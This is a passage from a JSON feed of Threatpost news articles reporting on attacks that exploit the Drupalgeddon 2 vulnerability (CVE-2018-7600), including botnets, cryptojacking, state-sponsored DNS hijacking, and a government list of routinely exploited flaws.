Security Services reported the [activity on Wednesday](<https://securityintelligence.com/threat-actors-prey-on-drupalgeddon-vulnerability-to-mass-compromise-websites-and-underlying-servers/>) and said a successful attack can open a backdoor to a vulnerable Drupal websites, giving adversaries complete control over the site. Under the [NIST Common Misuse Scoring System](<https://groups.drupal.org/security/faq-2018-002>), the Drupalgeddon 2.0 vulnerability has been given a score of 24/25, or highly critical.\n\nThe Drupal security team has known about the vulnerability[ since at least March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), reporting under [CVE-2018-7600](<https://www.drupal.org/SA-CORE-2018-002>). Upgrading older versions of Drupal 7 to 7.58 and older versions of Drupal 8 to 8.5.1 will patch the Drupalgeddon bug. Drupal is estimated to be used on 2.3 percent of all websites and web apps worldwide.\n\n\u201cThose found unpatched or vulnerable for some other reason might fall under the attacker\u2019s control, which could mean a complete compromise of that site,\u201d wrote co-authors Noah Adjonyo and Limor Kessem in a blog post. \u201cWith this level of control, the attacker has access to the site as a resource from which to steal data, host malicious content or launch additional attacks.\u201d\n\nAccording to researchers, the attackers scan websites looking specifically for the Drupalgeddon 2.0 vulnerability. If the target has the bug, attackers then scan the /user/register and /user/password pages in the installation phase while brute force attacking for a user password. Once the attacker has cracked the authentication vector, they install the Shellbot backdoor. The Shellbot instance that IBM\u2019s researchers have seen connected to an IRC channel, using the channel as a hub for command and control server instructions.\n\nShellbot is a malicious backdoor script which has been around since 2005. It\u2019s designed to exploit MySQL database driven websites, including those with a content management system (CMS) such as Drupal. Shellbot is constantly being re-configured to target different remote code execution vulnerabilities. As time goes on, it\u2019s conceivable a version of Shellbot could be exploiting web vulnerabilities that have yet to exist or be discovered.\n\nOnce the attacker\u2019s command-and-control server has shell access to a target Drupal webiste they can look for SQL injection vulnerabilities, executing DDoS attacks, distributing phishing email spam, and terminating any existing cryptominers in order to [install their own cryptomining malware](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>).\n\nOver the past year, since [Drupalgeddon was publicly disclosed and patched](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), there have been a number of cyber gangs that have exploited the vulnerability in sites as notable as [San Diego Zoo, Lenovo and the National Labor Relations Board](<https://threatpost.com/cryptojacking-campaign-exploits-drupal-bug-over-400-websites-attacked/131733/>). In many of those incidences adversaries have targeted systems ideal to plant [cryptocurrency miners](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>).\n\n\u201cInjection is still the number one item in the Open Web Application Security Project top ten,\u201d said Sean Wright, a lead application security engineer. \u201cIt continues to be an issue which presents itself and results in things such as remote code execution, such as in this case. Development teams need to ensure that they sanitize any data which they do not control to prevent issues such as this.\u201d\n\nAnother issue that constantly presents itself is the lack of patching. Organization are putting themselves at significant risk by not applying appropriate patches. After the Equifax breach last year, one would have thought that this would have provided a good example of why patching is so important. Unfortunately this appears to not have been the case.\n", "cvss3": {}, "published": "2018-10-11T20:24:54", "type": "threatpost", "title": "New Drupalgeddon Attacks Enlist Shellbot to Open Backdoors", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-10-11T20:24:54", "id": "THREATPOST:E1CCA676B9815B84D887370ABFDEE020", "href": "https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-03T07:11:44", "description": "Hackers have been stealing CPU-cycles from visitors to the Make-A-Wish Foundation\u2019s international website in order to mine for Monero cryptocurrency. Researchers said they found the CoinIMP mining script embedded in the non-profit\u2019s website, and that it was taking advantage of the Drupalgeddon 2 vulnerability.\n\nTrustwave researchers discovered the cryptominer on the Make-A-Wish International\u2019s [website](<https://worldwish.org/en>) and said it had been active since May. Make-A-Wish International is the global arm of the US-based Make-A-Wish Foundation.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/11/19094554/make-a-wish-.png>)\n\n\u201cEmbedded in the site was a script using the computing power of visitors to the site to mine cryptocurrency into the cybercriminals\u2019 pockets, making their \u2018wish\u2019 to be rich, come \u2018true,'\u201d said Simon Kenin, security researcher with Trustwave in a Monday [post](<https://www.trustwave.com/Resources/SpiderLabs-Blog/Hacker-s-Wish-Come-True-After-Infecting-Visitors-of-Make-A-Wish-Website-With-Cryptojacking/?page=1&year=0&month=0&LangType=1033>) outlining the discovery. \u201cIt\u2019s a shame when criminals target anyone but targeting a charity just before the holiday season? That\u2019s low.\u201d\n\nThe CoinIMP miner is JavaScript based and is often used by unsavory individuals who secretly embed the code into websites and use it to mine Monero currency on a site visitor\u2019s phone, tablet or computer.\n\nAccording to Kenin, the attack leveraged an unpatched instance of the Drupal online publishing platform and the [Drupalgeddon 2 vulnerability,](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>) patched in March.\n\n\u201cA quick investigation showed that the domain \u2018drupalupdates.tk\u2019 that was used to host the mining script is part of a known campaign which has been exploiting Drupalgeddon 2 in the wild since May 2018,\u201d said Kenin.\n\nWhile a patch for the critical remote-code execution bug ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), has been available for months, many sites have not updated and remain vulnerable. As of June, in fact, more than More than 115,000 sites were still [vulnerable](<https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/>).\n\nThis cryptojacking campaign was particularly difficult to find because it used different techniques to avoid static detections. For instance, it starts with changing the domain name that hosts the JavaScript miner (which is itself obfuscated). Then, the WebSocket proxy also used different domains and IPs to avoid blacklist solutions, according to Trustwave.\n\nKenin said he reached out to the Make-A-Wish organization, but didn\u2019t hear back \u2013 however, the injected script has since been removed from the site.\n\n\u201cWe are aware that the Make-A-Wish International Worldwish.org website was impacted by a vulnerability, which has been removed and remedied,\u201d A Make-A-Wish spokesperson told Threatpost. \u201cNo Make-A-Wish International donor or constituent data was compromised by this incident. Make-A-Wish International is redoubling its efforts to maintain website security against third-party threats.\u201d\n\nIn the meantime, Kenin warned that Drupal-based websites need to be updated or risk malicious exploits such as Drupalgeddon 2.\n\n\u201cDrupalgeddon 2 is not the only attack vector that cyber criminals use to infect sites with cryptojacking malware,\u201d he said. \u201cThe cryptojacking phenomenon is so widely spread that it is sometimes hard to tell whether a website is infected with malware or the mining code was genuinely added by the site owner. This is especially true of smaller sites, who might use cryptomining in a legitimate source of income but whose ability to secure their website might also be limited putting them at risk of cryptojacking compromise.\u201d\n", "cvss3": {}, "published": "2018-11-19T16:20:59", "type": "threatpost", "title": "Cryptojacking Attack Targets Make-A-Wish Foundation Website", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-11-19T16:20:59", "id": "THREATPOST:26EF81FADB8E1A92908C782EBBDB8C88", "href": "https://threatpost.com/cryptojacking-attack-targets-make-a-wish-foundation-website/139194/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-04-25T05:50:10", "description": "Researchers are warning a recently discovered and highly critical vulnerability found in Drupal\u2019s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that it believes at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quit a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also uses the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201dsaid Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhdtik also has capabilities to scan for vulnerable server apps using the the aiox86 scanning module. This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repurcussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2020-03-24T11:42:41", "description": "A newly-discovered state-sponsored campaign is targeting national security organizations across the Middle East and North Africa (MENA) \u2013 and elsewhere \u2013 with domain name system (DNS) hijacking attacks, used to scoop up credentials.\n\nThe campaign, dubbed \u201cSea Turtle\u201d by the Cisco Talos researchers who discovered it, began as early as January 2017 and has continued through the first quarter of 2019.\n\nAt least 40 different organizations across 13 various countries have been compromised so far by the campaign; in addition to the MENA victims, secondary targets, including telecom firms, ISPs and DNS registrars are being targeted in the U.S. and Sweden.\n\nResearchers in a [Wednesday analysis](<https://blog.talosintelligence.com/2019/04/seaturtle.html>) said that the attackers behind the campaign have the capabilities and sophistication to grow: \u201cWhile this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system,\u201d they said.\n\n## The Campaign\n\nThe campaigns have been utilizing DNS hijacking attacks, a type of attack where an individual redirects traffic meant to go to a legitimate website to a malicious server \u2014 meaning that they could easily harvest website credentials and other sensitive data that users are sharing with web forms and the like.\n\nSince 2017, more than 40 firms have been compromised by the Sea Turtle attacks \u2013 including national security organizations, ministries of foreign affairs and prominent energy organizations; and telecom firms, internet service providers (ISPs) and DNS registrars. That includes companies like consulting firm [Cafax](<http://www.cafax.se/Home.html>) and DNS registry [NetNod,](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) which have both released public statements on the attacks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123213/image1.jpg>)\n\nIn addition to these types of targets, researchers said the campaign represents the first known case of a domain name registry organization that was compromised for cyber-espionage operations. A domain name registry manages different parts of the domain registry, such as country code top-level domains and generic top-level domains. Compromising a domain name registry allows attackers to access the DNS logs, and highlights the sophistication of the attackers, researchers said.\n\nThe campaign has been \u201chighly successful,\u201d researchers said, in part because the attacker employed DNS hijacking and redirection attacks to access targeted networks, as traditional security products aren\u2019t designed to monitor DNS requests, said researchers: \u201cThe threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought,\u201d researchers said.\n\n## The Attacks\n\nThe attackers gained initial access either through spear-phishing emails or through exploiting known flaws.\n\nThe phishing emails were aimed at registrants and used to gain their credentials. From there, the bad actors could access an organization\u2019s DNS records with the registrant\u2019s credentials.\n\nor by exploiting known vulnerabilities \u2013 including a PHP code injection flaw in phpMyAdmin (CVE-2009-1151), a remote code exploit for Cisco integrated service router 2811 (CVE-2017-6736) and the infamous \u201cDrupalgeddon\u201d remote code execution Drupal glitch (CVE-2018-7600).\n\nA list of impacted CVEs used by the attacker is below \u2013 but researchers say that they believe the list is incomplete and \u201cthe actor in question can leverage known vulnerabilities as they encounter a new threat surface.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123327/Screen-Shot-2019-04-17-at-12.03.19-PM.png>)\n\nOnce they gained access to a network, an attacker would access the DNS registry and modify the name system records for targeted firms, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries \u2013 allowing them to trick users to give them their credentials.\n\n\u201cThe amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days,\u201d researchers said. \u201cThis type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world.\u201d\n\nThe threat actors also used an array of techniques to evade detection, researchers said.\n\nFor instance, once users put their credentials into impersonated services, they would then be passed to the legitimate service, and couldn\u2019t tell that anything was wrong.\n\nAttackers also used an interesting technique called certificate impersonation, where attackers stole a certificate authority-signed X.509 certificate from another provider for the same domain, imitating the one already used by the targeted organization \u2013 making the web browser seem more legitimate.\n\n## Other Campaigns\n\nResearchers said that they assess with high confidence that the hijacking attacks are being launched by an advanced, state-sponsored actor looking to access sensitive networks and systems \u2013 but stayed mum on who exactly that actor was.\n\n\u201cThis is the first time Cisco Talos is documenting operations conducted by this threat actor,\u201d Craig Williams, director of Talos Outreach at Cisco, told Threatpost. \u201cWhile we assess with high confidence that this activity was carried out by an advanced, state-sponsored actor, we defer to law enforcement officials on establishing attribution.\u201d\n\nDNS-based attacks are an increasing worry for governments and enterprises alike.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123429/image3.png>)\n\nDNS Hijack Attack Vector\n\n[In January,](<https://threatpost.com/gov-warning-dns-hijacking/141088/>) the Department of Homeland Security is ordering all federal agencies to urgently audit DNS security for their domains in the next 10 business days.\n\nAlso [in January](<https://threatpost.com/unprecedented-dns-hijacking-attacks-linked-to-iran/140737/>), a wave of DNS hijacking attacks targeting victims in North America, Europe, Middle East and North Africa were linked to Iran. The attacks, which were related to a campaign dubbed \u201cDNSpionage\u201d by Cisco Talos researchers, had a high degree of success harvesting targets\u2019 credentials, according to the firm.\n\nHowever, Talos researchers said they assess with high confidence that the DNSpionage operations are \u201cdistinctly different and independent\u201d from the Sea Turtle campaign.\n\n\u201cThe report assesses with high confidence that Sea Turtle operations are distinctly different and independent from DNSpionage operations,\u201d Williams told Threatpost. \u201cDNSpionage and Sea Turtle have a strong correlation in that they both use the DNS hijacking/re-direction methodologies to perform their attacks. However, both campaigns\u2019 level of maturity and capability are distinctly different. Sea Turtle has a much more mature level of playbook by attacking their ancillary targets before shifting their focus to a specific set of Middle Eastern and African victims. Due to the closely related nature of the attacks, overlapping TTPs [tactics, techniques and procedures] are common, but our visibility makes it very clear these are two different groups.\u201d\n\nTo protect against these DNS hijacking attacks, Williams said that companies can implement a registry lock service, multi-factor authentication (to access DNS records), and of course staying up to date on patches, especially on internet-facing machines.\n\nHowever, \u201conce these credentials are stolen, it is virtually impossible to completely shut down a campaign until the credentials are regained, changed and locked,\u201d he told Threatpost.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "cvss3": {}, "published": "2019-04-17T17:32:06", "type": "threatpost", "title": "State-Sponsored DNS Hijacking Infiltrates 40 Firms Globally", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2017-6736", "CVE-2018-7600", "CVE-2020-1938"], "modified": "2019-04-17T17:32:06", "id": "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "href": "https://threatpost.com/dns-hijacking-campaign-40-firms-globally/143870/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:27", "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. \u201cAs in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader pacyload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file meanwhile is the malware\u2019s worm propagation mechanism. It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Theatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-25T18:30:59", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "modified": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and Citrix Gateway that left unpatched outfits at risk from a trivial attack on their internal operations. As of December 2020, 17 percent \u2013 about one in five of the 80,000 companies affected \u2013 hadn\u2019t patched.\n * [CVE 2019-11510](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>): a critical Pulse Secure VPN flaw exploited in several cyberattacks that targeted companies that had previously patched a related flaw in the VPN. In April 2020, the Department of Homeland Security (DHS) urged users to change their passwords for [Active Directory](<https://threatpost.com/podcast-securing-active-directory-nightmare/168203/>) accounts, given that the patches were deployed too late to stop bad actors from compromising those accounts.\n * [CVE 2018-13379](<https://threatpost.com/fbi-apts-actively-exploiting-fortinet-vpn-security-holes/165213/>): a path-traversal weakness in VPNs made by Fortinet that was discovered in 2018 and which was actively being exploited as of a few months ago, in April 2021.\n * [CVE 2020-5902](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>): a critical vulnerability in F5 Networks\u2019 BIG-IP advanced delivery controller networking devices that, as of July 2020, was being exploited by attackers to scrape credentials, launch malware and more.\n\nThe cybersecurity bodies urged organizations to remediate or mitigate vulnerabilities as soon as possible to reduce their risk of being ripped up. For those that can\u2019t do that, the advisory encouraged organizations to check for the presence of indicators of compromise (IOCs).\n\nIf IOCs are found, kick off incident response and recovery plans, and let CISA know: the advisory contains instructions on how to report incidents or request technical help.\n\n## 2020 Top 12 Exploited Vulnerabilities\n\nHere\u2019s the full list of the top dozen exploited bugs from last year:\n\n**Vendor** | **CVE** | **Type** \n---|---|--- \nCitrix | CVE-2019-19781 | arbitrary code execution \nPulse | CVE 2019-11510 | arbitrary file reading \nFortinet | CVE 2018-13379 | path traversal \nF5- Big IP | CVE 2020-5902 | remote code execution (RCE) \nMobileIron | CVE 2020-15505 | RCE \nMicrosoft | CVE-2017-11882 | RCE \nAtlassian | CVE-2019-11580 | RCE \nDrupal | CVE-2018-7600 | RCE \nTelerik | CVE 2019-18935 | RCE \nMicrosoft | CVE-2019-0604 | RCE \nMicrosoft | CVE-2020-0787 | elevation of privilege \nNetlogon | CVE-2020-1472 | elevation of privilege \n \n## Most Exploited So Far in 2021\n\nCISA et al. also listed these 13 flaws, all discovered this year, that are also being energetically exploited:\n\n * Microsoft Exchange: CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE2021-27065: four flaws that can be chained together in the ProxyLogon group of security bugs that led to a [patching frenzy](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>). The frenzy was warranted: as of March, Microsoft said that 92 percent of Exchange Servers were vulnerable to [ProxyLogon](<https://threatpost.com/microsoft-exchange-exploits-ransomware/164719/>).\n * Pulse Secure: CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900. As of May, CVE-2021-22893 was being used by at least two advanced persistent threat actors (APTs), likely linked to China, [to attack U.S. defense targets,](<https://threatpost.com/pulse-secure-vpns-fix-critical-zero-day-bugs/165850/>) among others.\n * Accellion: CVE-2021-27101, CVE-2021-27102, CVE-2021-27103, CVE-2021-27104. These ones led to scads of attacks, including [on Shell](<https://threatpost.com/shell-victim-of-accellion-attacks/164973/>). Around 100 Accellion FTA customers, including the [Jones Day Law Firm](<https://threatpost.com/stolen-jones-day-law-firm-files-posted/164066/>), Kroger [and Singtel](<https://threatpost.com/singtel-zero-day-cyberattack/163938/>), were affected by attacks [tied to FIN11 and the Clop ransomware gang](<https://threatpost.com/accellion-zero-day-attacks-clop-ransomware-fin11/164150/>).\n * VMware: CVE-2021-21985: A [critical bug](<https://threatpost.com/vmware-ransomware-alarm-critical-bug/166501/>) in VMware\u2019s virtualization management platform, vCenter Server, that allows a remote attacker to exploit the product and take control of a company\u2019s affected system.\n\nThe advisory gave technical details for all these vulnerabilities along with guidance on mitigation and IOCs to help organizations figure out if they\u2019re vulnerable or have already been compromised. The advisory also offers guidance for locking down systems.\n\n## Can Security Teams Keep Up?\n\nRick Holland, Digital Shadows CISO and vice president of strategy, called CISA vulnerability alerts an \u201cinfluential tool to help teams stay above water and minimize their attack surface.\u201d\n\nThe CVEs highlighted in Wednesday\u2019s alert \u201ccontinue to demonstrate that attackers are going after known vulnerabilities and leverage zero-days only when necessary,\u201d he told Threatpost on Thursday.\n\nRecent research 